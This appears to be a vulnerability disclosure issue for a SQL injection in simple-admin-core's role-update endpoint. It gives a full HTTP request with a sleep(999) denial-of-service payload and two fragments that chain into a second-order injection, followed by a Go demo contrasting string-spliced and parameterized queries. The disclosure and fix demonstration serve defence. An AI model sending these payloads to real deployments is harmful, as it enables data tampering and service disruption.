There is a restricted SQL injection vulnerability in simple-admin-core. #333

@66Giraffe66

Description

  • The /sys-api/role/update interface of simple-admin-core has a limited SQL injection vulnerability that may lead to partial data leakage or disruption of normal system operation.

Affected versions

  • v1.2.0 ~ v1.6.7

Vulnerability Analysis

  • The root cause is that the code value passed to the /sys-api/role/update interface is inserted directly into the SQL statement that operates on the casbin_rules table, rather than being bound as a parameter. Because the system restricts code to at most 20 characters, the potential harm of a single injected value is very limited; the length check limits the payload, but it does not neutralize quotes or comment sequences.

  • In theory, if the contents of the casbin_rules table could be queried through some interface, shorter statements could be constructed that update a field in the table to the data to be leaked. However, I haven't found an interface that displays the data in this table.
  • Also in theory, a role could first be created with its code set to the second half of an SQL statement, and a second-order injection could then be triggered during the update, allowing a payload of 20*2=40 characters to be assembled, similar to the following:
update casbin_rules set v0='',v0=(select/*) WHERE v0='*/database()#'  

  • Additionally, a MySQL denial of service (DoS) is possible: sending many requests whose code contains a long sleep() occupies the database thread pool and disrupts normal operation.
  • Finally, the content of the update can be controlled to modify data in the table arbitrarily, again impacting normal operation.

  • Complete packet
POST /sys-api/role/update HTTP/1.1
Host: 192.168.236.54
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: application/json, text/plain, */*
Accept-Language: zh
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJkZXB0SWQiOjEsImV4cCI6MTc0Nzk5NTI4NSwiaWF0IjoxNzQ3NzM2MDg1LCJyb2xlSWQiOiIwMDEiLCJ1c2VySWQiOiIwMTk2ZWM2Mi1kNDkyLTcxZTYtOTAzZS1lYzk5ODAyMzZjMTEifQ.ya-pcDJ3_MrxadP_y7vLwxGb2l4tb7ITrC7Uh65Pjf8
Content-Length: 105
Origin: http://192.168.236.54
DNT: 1
Sec-GPC: 1
Connection: close
Referer: http://192.168.236.54/
Priority: u=0

{"sort":55,"status":1,"id":4,"name":"right","code":"1'or sleep(999)#","defaultRouter":"test","remark":""}
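
To make the analysis above concrete, the following is an added Go example written for this page; it is not simple-admin-core's own code. It models the flaw class the issue describes (the role code spliced into an UPDATE on casbin_rules as text) next to the parameterized form, models the 20-character limit the issue says is the only restriction, and adds a hypothetical allowlist as the check a practitioner would want. The exact statement shape (SET v0 = new WHERE v0 = old), the function names, the allowlist pattern and the comment-stripping helper are assumptions for the demo; the payloads are the ones from the issue (the sleep value from the captured request, and the two fragments of the second-order example).

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// buildUpdateVulnerable reproduces the flaw class described in the issue:
// the role code is spliced into the UPDATE on casbin_rules as text.
// The statement shape (SET v0 = new WHERE v0 = old) is an assumption for
// this demo, not a copy of the project's real query.
func buildUpdateVulnerable(newCode, oldCode string) string {
	return fmt.Sprintf("update casbin_rules set v0='%s' WHERE v0='%s'", newCode, oldCode)
}

// buildUpdateSafe is the fix: the codes travel as bound parameters, so a
// quote, "/*" or "#" inside them is data the driver escapes, never syntax.
func buildUpdateSafe(newCode, oldCode string) (string, []any) {
	return "update casbin_rules set v0=? WHERE v0=?", []any{newCode, oldCode}
}

// lengthOnly models the only defence the issue reports: at most 20 chars.
func lengthOnly(code string) bool { return len(code) <= 20 }

// roleCodePattern is an additional, hypothetical allowlist (assumption, not
// from the project): a casbin subject never needs quotes, comment markers
// or whitespace, so anything outside this set is rejected before any SQL.
var roleCodePattern = regexp.MustCompile(`^[A-Za-z0-9_-]{1,20}$`)

func allowlisted(code string) bool { return roleCodePattern.MatchString(code) }

// effectiveSQL approximates what MySQL parses from the injected statement:
// each /* ... */ block becomes a single space and '#' discards the rest of
// the line. It ignores quoting rules, which is enough to show how the two
// halves join up but is not a real SQL parser.
func effectiveSQL(q string) string {
	for {
		start := strings.Index(q, "/*")
		if start < 0 {
			break
		}
		rest := q[start+2:]
		end := strings.Index(rest, "*/")
		if end < 0 {
			q = q[:start]
			break
		}
		q = q[:start] + " " + rest[end+2:]
	}
	if i := strings.Index(q, "#"); i >= 0 {
		q = q[:i]
	}
	return q
}

// Payloads taken from the issue. sleepPayload is the code value in the
// captured request; newHalf/oldHalf are the two fragments of the
// second-order example (role created with oldHalf, then updated to newHalf).
// Each fragment fits the 20-character limit on its own.
const (
	sleepPayload = "1'or sleep(999)#"
	newHalf      = "',v0=(select/*"
	oldHalf      = "*/database()#"
)

func main() {
	for _, c := range []struct{ name, newCode, oldCode string }{
		{"sleep", sleepPayload, "right"},
		{"second-order", newHalf, oldHalf},
	} {
		q := buildUpdateVulnerable(c.newCode, c.oldCode)
		fmt.Printf("%s: within 20 chars=%v allowlisted=%v\n",
			c.name, lengthOnly(c.newCode) && lengthOnly(c.oldCode), allowlisted(c.newCode))
		fmt.Println("  built:     ", q)
		fmt.Println("  effective: ", effectiveSQL(q))
	}
	sq, args := buildUpdateSafe(newHalf, oldHalf)
	fmt.Println("safe:", sq, args)
}
```

Running it shows the point of the second-order bullet: both fragments pass the length check, yet once the statement is assembled the /* ... */ comment swallows the closing quote and WHERE clause, leaving an UPDATE that writes database() into every row's v0. The parameterized builder keeps the same fragments out of the SQL text entirely, and the allowlist rejects them before any query is built.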
